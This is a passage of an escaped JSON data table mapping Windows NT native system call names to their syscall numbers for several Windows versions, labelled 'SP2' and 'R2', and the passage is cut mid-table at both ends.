\"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAcquireCMFViewOwnership\": 102, \"NtAddBootEntry\": 103, \"NtAddDriverEntry\": 104, \"NtAdjustGroupsToken\": 105, \"NtAlertResumeThread\": 106, \"NtAlertThread\": 107, \"NtAllocateLocallyUniqueId\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtRequestDeviceWakeup\": 134, \"NtCancelIoFileEx\": 135, \"NtCancelSynchronousIoFile\": 136, \"NtCommitComplete\": 137, \"NtCommitEnlistment\": 138, \"NtCommitTransaction\": 139, \"NtCompactKeys\": 140, \"NtCompareTokens\": 141, \"NtCompleteConnectPort\": 142, \"NtCompressKey\": 143, \"NtConnectPort\": 144, \"NtCreateDebugObject\": 145, \"NtCreateDirectoryObject\": 146, \"NtCreateEnlistment\": 147, \"NtCreateEventPair\": 148, \"NtCreateIoCompletion\": 149, \"NtCreateJobObject\": 150, \"NtCreateJobSet\": 151, \"NtCreateKeyTransacted\": 152, \"NtCreateKeyedEvent\": 153, \"NtCreateMailslotFile\": 154, \"NtCreateMutant\": 155, \"NtCreateNamedPipeFile\": 156, \"NtCreatePagingFile\": 157, \"NtCreatePort\": 158, \"NtCreatePrivateNamespace\": 159, \"NtCreateProcess\": 160, \"NtCreateProfile\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisplayString\": 183, \"NtEnumerateBootEntries\": 184, \"NtEnumerateDriverEntries\": 185, \"NtEnumerateSystemEnvironmentValuesEx\": 186, \"NtEnumerateTransactionObject\": 187, \"NtExtendSection\": 188, \"NtFilterToken\": 189, \"NtFlushInstallUILanguage\": 190, \"NtFlushInstructionCache\": 191, \"NtFlushKey\": 192, \"NtFlushProcessWriteBuffers\": 193, \"NtFlushVirtualMemory\": 194, \"NtFlushWriteBuffer\": 195, \"NtFreeUserPhysicalPages\": 196, \"NtFreezeRegistry\": 197, \"NtFreezeTransactions\": 198, \"NtGetContextThread\": 199, \"NtGetCurrentProcessorNumber\": 200, \"NtGetDevicePowerState\": 201, \"NtGetMUIRegistryInfo\": 202, \"NtGetNextProcess\": 203, \"NtGetNextThread\": 204, \"NtGetNlsSectionPtr\": 205, \"NtGetNotificationResourceManager\": 206, \"NtGetPlugPlayEvent\": 207, \"NtGetWriteWatch\": 208, \"NtImpersonateAnonymousToken\": 209, \"NtImpersonateThread\": 210, \"NtInitializeNlsFiles\": 211, \"NtInitializeRegistry\": 212, \"NtInitiatePowerAction\": 213, \"NtIsSystemResumeAutomatic\": 214, \"NtIsUILanguageComitted\": 215, \"NtListenPort\": 216, \"NtLoadDriver\": 217, \"NtLoadKey\": 218, \"NtLoadKey2\": 219, \"NtLoadKeyEx\": 220, \"NtLockFile\": 221, \"NtLockProductActivationKeys\": 222, \"NtLockRegistryKey\": 223, \"NtLockVirtualMemory\": 224, \"NtMakePermanentObject\": 225, \"NtMakeTemporaryObject\": 226, \"NtMapCMFModule\": 227, \"NtMapUserPhysicalPages\": 228, \"NtModifyBootEntry\": 229, \"NtModifyDriverEntry\": 230, \"NtNotifyChangeDirectoryFile\": 231, \"NtNotifyChangeKey\": 232, \"NtNotifyChangeMultipleKeys\": 233, \"NtOpenEnlistment\": 234, \"NtOpenEventPair\": 235, \"NtOpenIoCompletion\": 236, \"NtOpenJobObject\": 237, \"NtOpenKeyTransacted\": 238, \"NtOpenKeyedEvent\": 239, \"NtOpenMutant\": 240, \"NtOpenObjectAuditAlarm\": 241, \"NtOpenPrivateNamespace\": 242, \"NtOpenProcessToken\": 243, \"NtOpenResourceManager\": 244, \"NtOpenSemaphore\": 245, \"NtOpenSession\": 246, \"NtOpenSymbolicLinkObject\": 247, \"NtOpenThread\": 248, \"NtOpenTimer\": 249, \"NtOpenTransaction\": 250, \"NtOpenTransactionManager\": 251, \"NtPlugPlayControl\": 252, \"NtPrePrepareComplete\": 253, \"NtPrePrepareEnlistment\": 254, \"NtPrepareComplete\": 255, \"NtPrepareEnlistment\": 256, \"NtPrivilegeCheck\": 257, \"NtPrivilegeObjectAuditAlarm\": 258, \"NtPrivilegedServiceAuditAlarm\": 259, \"NtPropagationComplete\": 260, \"NtPropagationFailed\": 261, \"NtPulseEvent\": 262, \"NtQueryBootEntryOrder\": 263, \"NtQueryBootOptions\": 264, \"NtQueryDebugFilterState\": 265, \"NtQueryDirectoryObject\": 266, \"NtQueryDriverEntryOrder\": 267, \"NtQueryEaFile\": 268, \"NtQueryFullAttributesFile\": 269, \"NtQueryInformationAtom\": 270, \"NtQueryInformationEnlistment\": 271, \"NtQueryInformationJobObject\": 272, \"NtQueryInformationPort\": 273, \"NtQueryInformationResourceManager\": 274, \"NtQueryInformationTransaction\": 275, \"NtQueryInformationTransactionManager\": 276, \"NtQueryInformationWorkerFactory\": 277, \"NtQueryInstallUILanguage\": 278, \"NtQueryIntervalProfile\": 279, \"NtQueryIoCompletion\": 280, \"NtQueryLicenseValue\": 281, \"NtQueryMultipleValueKey\": 282, \"NtQueryMutant\": 283, \"NtQueryOpenSubKeys\": 284, \"NtQueryOpenSubKeysEx\": 285, \"NtQueryPortInformationProcess\": 286, \"NtQueryQuotaInformationFile\": 287, \"NtQuerySecurityObject\": 288, \"NtQuerySemaphore\": 289, \"NtQuerySymbolicLinkObject\": 290, \"NtQuerySystemEnvironmentValue\": 291, \"NtQuerySystemEnvironmentValueEx\": 292, \"NtQueryTimerResolution\": 293, \"NtRaiseException\": 294, \"NtRaiseHardError\": 295, \"NtReadOnlyEnlistment\": 296, \"NtRecoverEnlistment\": 297, \"NtRecoverResourceManager\": 298, \"NtRecoverTransactionManager\": 299, \"NtRegisterProtocolAddressInformation\": 300, \"NtRegisterThreadTerminatePort\": 301, \"NtReleaseCMFViewOwnership\": 302, \"NtReleaseKeyedEvent\": 303, \"NtReleaseWorkerFactoryWorker\": 304, \"NtRemoveIoCompletionEx\": 305, \"NtRemoveProcessDebug\": 306, \"NtRenameKey\": 307, \"NtRenameTransactionManager\": 308, \"NtReplaceKey\": 309, \"NtReplacePartitionUnit\": 310, \"NtReplyWaitReplyPort\": 311, \"NtCancelDeviceWakeupRequest\": 312, \"NtRequestPort\": 313, \"NtRequestWakeupLatency\": 314, \"NtResetEvent\": 315, \"NtResetWriteWatch\": 316, \"NtRestoreKey\": 317, \"NtResumeProcess\": 318, \"NtRollbackComplete\": 319, \"NtRollbackEnlistment\": 320, \"NtRollbackTransaction\": 321, \"NtRollforwardTransactionManager\": 322, \"NtSaveKey\": 323, \"NtSaveKeyEx\": 324, \"NtSaveMergedKeys\": 325, \"NtSecureConnectPort\": 326, \"NtSetBootEntryOrder\": 327, \"NtSetBootOptions\": 328, \"NtSetContextThread\": 329, \"NtSetDebugFilterState\": 330, \"NtSetDefaultHardErrorPort\": 331, \"NtSetDefaultLocale\": 332, \"NtSetDefaultUILanguage\": 333, \"NtSetDriverEntryOrder\": 334, \"NtSetEaFile\": 335, \"NtSetHighEventPair\": 336, \"NtSetHighWaitLowEventPair\": 337, \"NtSetInformationDebugObject\": 338, \"NtSetInformationEnlistment\": 339, \"NtSetInformationJobObject\": 340, \"NtSetInformationKey\": 341, \"NtSetInformationResourceManager\": 342, \"NtSetInformationToken\": 343, \"NtSetInformationTransaction\": 344, \"NtSetInformationTransactionManager\": 345, \"NtSetInformationWorkerFactory\": 346, \"NtSetIntervalProfile\": 347, \"NtSetIoCompletion\": 348, \"NtSetLdtEntries\": 349, \"NtSetLowEventPair\": 350, \"NtSetLowWaitHighEventPair\": 351, \"NtSetQuotaInformationFile\": 352, \"NtSetSecurityObject\": 353, \"NtSetSystemEnvironmentValue\": 354, \"NtSetSystemEnvironmentValueEx\": 355, \"NtSetSystemInformation\": 356, \"NtSetSystemPowerState\": 357, \"NtSetSystemTime\": 358, \"NtSetThreadExecutionState\": 359, \"NtSetTimerResolution\": 360, \"NtSetUuidSeed\": 361, \"NtSetVolumeInformationFile\": 362, \"NtShutdownSystem\": 363, \"NtShutdownWorkerFactory\": 364, \"NtSignalAndWaitForSingleObject\": 365, \"NtSinglePhaseReject\": 366, \"NtStartProfile\": 367, \"NtStopProfile\": 368, \"NtSuspendProcess\": 369, \"NtSuspendThread\": 370, \"NtSystemDebugControl\": 371, \"NtTerminateJobObject\": 372, \"NtTestAlert\": 373, \"NtThawRegistry\": 374, \"NtThawTransactions\": 375, \"NtTraceControl\": 376, \"NtTranslateFilePath\": 377, \"NtUnloadDriver\": 378, \"NtUnloadKey\": 379, \"NtUnloadKey2\": 380, \"NtUnloadKeyEx\": 381, \"NtUnlockFile\": 382, \"NtUnlockVirtualMemory\": 383, \"NtVdmControl\": 384, \"NtWaitForDebugEvent\": 385, \"NtWaitForKeyedEvent\": 386, \"NtWaitForWorkViaWorkerFactory\": 387, \"NtWaitHighEventPair\": 388, \"NtWaitLowEventPair\": 389, \"NtWorkerFactoryWorkerReady\": 390}, \"SP2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAcquireCMFViewOwnership\": 102, \"NtAddBootEntry\": 103, \"NtAddDriverEntry\": 104, \"NtAdjustGroupsToken\": 105, \"NtAlertResumeThread\": 106, \"NtAlertThread\": 107, \"NtAllocateLocallyUniqueId\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelDeviceWakeupRequest\": 134, \"NtCancelIoFileEx\": 135, \"NtCancelSynchronousIoFile\": 136, \"NtCommitComplete\": 137, \"NtCommitEnlistment\": 138, \"NtCommitTransaction\": 139, \"NtCompactKeys\": 140, \"NtCompareTokens\": 141, \"NtCompleteConnectPort\": 142, \"NtCompressKey\": 143, \"NtConnectPort\": 144, \"NtCreateDebugObject\": 145, \"NtCreateDirectoryObject\": 146, \"NtCreateEnlistment\": 147, \"NtCreateEventPair\": 148, \"NtCreateIoCompletion\": 149, \"NtCreateJobObject\": 150, \"NtCreateJobSet\": 151, \"NtCreateKeyTransacted\": 152, \"NtCreateKeyedEvent\": 153, \"NtCreateMailslotFile\": 154, \"NtCreateMutant\": 155, \"NtCreateNamedPipeFile\": 156, \"NtCreatePagingFile\": 157, \"NtCreatePort\": 158, \"NtCreatePrivateNamespace\": 159, \"NtCreateProcess\": 160, \"NtCreateProfile\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisplayString\": 183, \"NtEnumerateBootEntries\": 184, \"NtEnumerateDriverEntries\": 185, \"NtEnumerateSystemEnvironmentValuesEx\": 186, \"NtEnumerateTransactionObject\": 187, \"NtExtendSection\": 188, \"NtFilterToken\": 189, \"NtFlushInstallUILanguage\": 190, \"NtFlushInstructionCache\": 191, \"NtFlushKey\": 192, \"NtFlushProcessWriteBuffers\": 193, \"NtFlushVirtualMemory\": 194, \"NtFlushWriteBuffer\": 195, \"NtFreeUserPhysicalPages\": 196, \"NtFreezeRegistry\": 197, \"NtFreezeTransactions\": 198, \"NtGetContextThread\": 199, \"NtGetCurrentProcessorNumber\": 200, \"NtGetDevicePowerState\": 201, \"NtGetMUIRegistryInfo\": 202, \"NtGetNextProcess\": 203, \"NtGetNextThread\": 204, \"NtGetNlsSectionPtr\": 205, \"NtGetNotificationResourceManager\": 206, \"NtGetPlugPlayEvent\": 207, \"NtGetWriteWatch\": 208, \"NtImpersonateAnonymousToken\": 209, \"NtImpersonateThread\": 210, \"NtInitializeNlsFiles\": 211, \"NtInitializeRegistry\": 212, \"NtInitiatePowerAction\": 213, \"NtIsSystemResumeAutomatic\": 214, \"NtIsUILanguageComitted\": 215, \"NtListenPort\": 216, \"NtLoadDriver\": 217, \"NtLoadKey\": 218, \"NtLoadKey2\": 219, \"NtLoadKeyEx\": 220, \"NtLockFile\": 221, \"NtLockProductActivationKeys\": 222, \"NtLockRegistryKey\": 223, \"NtLockVirtualMemory\": 224, \"NtMakePermanentObject\": 225, \"NtMakeTemporaryObject\": 226, \"NtMapCMFModule\": 227, \"NtMapUserPhysicalPages\": 228, \"NtModifyBootEntry\": 229, \"NtModifyDriverEntry\": 230, \"NtNotifyChangeDirectoryFile\": 231, \"NtNotifyChangeKey\": 232, \"NtNotifyChangeMultipleKeys\": 233, \"NtOpenEnlistment\": 234, \"NtOpenEventPair\": 235, \"NtOpenIoCompletion\": 236, \"NtOpenJobObject\": 237, \"NtOpenKeyTransacted\": 238, \"NtOpenKeyedEvent\": 239, \"NtOpenMutant\": 240, \"NtOpenObjectAuditAlarm\": 241, \"NtOpenPrivateNamespace\": 242, \"NtOpenProcessToken\": 243, \"NtOpenResourceManager\": 244, \"NtOpenSemaphore\": 245, \"NtOpenSession\": 246, \"NtOpenSymbolicLinkObject\": 247, \"NtOpenThread\": 248, \"NtOpenTimer\": 249, \"NtOpenTransaction\": 250, \"NtOpenTransactionManager\": 251, \"NtPlugPlayControl\": 252, \"NtPrePrepareComplete\": 253, \"NtPrePrepareEnlistment\": 254, \"NtPrepareComplete\": 255, \"NtPrepareEnlistment\": 256, \"NtPrivilegeCheck\": 257, \"NtPrivilegeObjectAuditAlarm\": 258, \"NtPrivilegedServiceAuditAlarm\": 259, \"NtPropagationComplete\": 260, \"NtPropagationFailed\": 261, \"NtPulseEvent\": 262, \"NtQueryBootEntryOrder\": 263, \"NtQueryBootOptions\": 264, \"NtQueryDebugFilterState\": 265, \"NtQueryDirectoryObject\": 266, \"NtQueryDriverEntryOrder\": 267, \"NtQueryEaFile\": 268, \"NtQueryFullAttributesFile\": 269, \"NtQueryInformationAtom\": 270, \"NtQueryInformationEnlistment\": 271, \"NtQueryInformationJobObject\": 272, \"NtQueryInformationPort\": 273, \"NtQueryInformationResourceManager\": 274, \"NtQueryInformationTransaction\": 275, \"NtQueryInformationTransactionManager\": 276, \"NtQueryInformationWorkerFactory\": 277, \"NtQueryInstallUILanguage\": 278, \"NtQueryIntervalProfile\": 279, \"NtQueryIoCompletion\": 280, \"NtQueryLicenseValue\": 281, \"NtQueryMultipleValueKey\": 282, \"NtQueryMutant\": 283, \"NtQueryOpenSubKeys\": 284, \"NtQueryOpenSubKeysEx\": 285, \"NtQueryPortInformationProcess\": 286, \"NtQueryQuotaInformationFile\": 287, \"NtQuerySecurityObject\": 288, \"NtQuerySemaphore\": 289, \"NtQuerySymbolicLinkObject\": 290, \"NtQuerySystemEnvironmentValue\": 291, \"NtQuerySystemEnvironmentValueEx\": 292, \"NtQueryTimerResolution\": 293, \"NtRaiseException\": 294, \"NtRaiseHardError\": 295, \"NtReadOnlyEnlistment\": 296, \"NtRecoverEnlistment\": 297, \"NtRecoverResourceManager\": 298, \"NtRecoverTransactionManager\": 299, \"NtRegisterProtocolAddressInformation\": 300, \"NtRegisterThreadTerminatePort\": 301, \"NtReleaseCMFViewOwnership\": 302, \"NtReleaseKeyedEvent\": 303, \"NtReleaseWorkerFactoryWorker\": 304, \"NtRemoveIoCompletionEx\": 305, \"NtRemoveProcessDebug\": 306, \"NtRenameKey\": 307, \"NtRenameTransactionManager\": 308, \"NtReplaceKey\": 309, \"NtReplacePartitionUnit\": 310, \"NtReplyWaitReplyPort\": 311, \"NtRequestDeviceWakeup\": 312, \"NtRequestPort\": 313, \"NtRequestWakeupLatency\": 314, \"NtResetEvent\": 315, \"NtResetWriteWatch\": 316, \"NtRestoreKey\": 317, \"NtResumeProcess\": 318, \"NtRollbackComplete\": 319, \"NtRollbackEnlistment\": 320, \"NtRollbackTransaction\": 321, \"NtRollforwardTransactionManager\": 322, \"NtSaveKey\": 323, \"NtSaveKeyEx\": 324, \"NtSaveMergedKeys\": 325, \"NtSecureConnectPort\": 326, \"NtSetBootEntryOrder\": 327, \"NtSetBootOptions\": 328, \"NtSetContextThread\": 329, \"NtSetDebugFilterState\": 330, \"NtSetDefaultHardErrorPort\": 331, \"NtSetDefaultLocale\": 332, \"NtSetDefaultUILanguage\": 333, \"NtSetDriverEntryOrder\": 334, \"NtSetEaFile\": 335, \"NtSetHighEventPair\": 336, \"NtSetHighWaitLowEventPair\": 337, \"NtSetInformationDebugObject\": 338, \"NtSetInformationEnlistment\": 339, \"NtSetInformationJobObject\": 340, \"NtSetInformationKey\": 341, \"NtSetInformationResourceManager\": 342, \"NtSetInformationToken\": 343, \"NtSetInformationTransaction\": 344, \"NtSetInformationTransactionManager\": 345, \"NtSetInformationWorkerFactory\": 346, \"NtSetIntervalProfile\": 347, \"NtSetIoCompletion\": 348, \"NtSetLdtEntries\": 349, \"NtSetLowEventPair\": 350, \"NtSetLowWaitHighEventPair\": 351, \"NtSetQuotaInformationFile\": 352, \"NtSetSecurityObject\": 353, \"NtSetSystemEnvironmentValue\": 354, \"NtSetSystemEnvironmentValueEx\": 355, \"NtSetSystemInformation\": 356, \"NtSetSystemPowerState\": 357, \"NtSetSystemTime\": 358, \"NtSetThreadExecutionState\": 359, \"NtSetTimerResolution\": 360, \"NtSetUuidSeed\": 361, \"NtSetVolumeInformationFile\": 362, \"NtShutdownSystem\": 363, \"NtShutdownWorkerFactory\": 364, \"NtSignalAndWaitForSingleObject\": 365, \"NtSinglePhaseReject\": 366, \"NtStartProfile\": 367, \"NtStopProfile\": 368, \"NtSuspendProcess\": 369, \"NtSuspendThread\": 370, \"NtSystemDebugControl\": 371, \"NtTerminateJobObject\": 372, \"NtTestAlert\": 373, \"NtThawRegistry\": 374, \"NtThawTransactions\": 375, \"NtTraceControl\": 376, \"NtTranslateFilePath\": 377, \"NtUnloadDriver\": 378, \"NtUnloadKey\": 379, \"NtUnloadKey2\": 380, \"NtUnloadKeyEx\": 381, \"NtUnlockFile\": 382, \"NtUnlockVirtualMemory\": 383, \"NtVdmControl\": 384, \"NtWaitForDebugEvent\": 385, \"NtWaitForKeyedEvent\": 386, \"NtWaitForWorkViaWorkerFactory\": 387, \"NtWaitHighEventPair\": 388, \"NtWaitLowEventPair\": 389, \"NtWorkerFactoryWorkerReady\": 390}, \"R2\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, 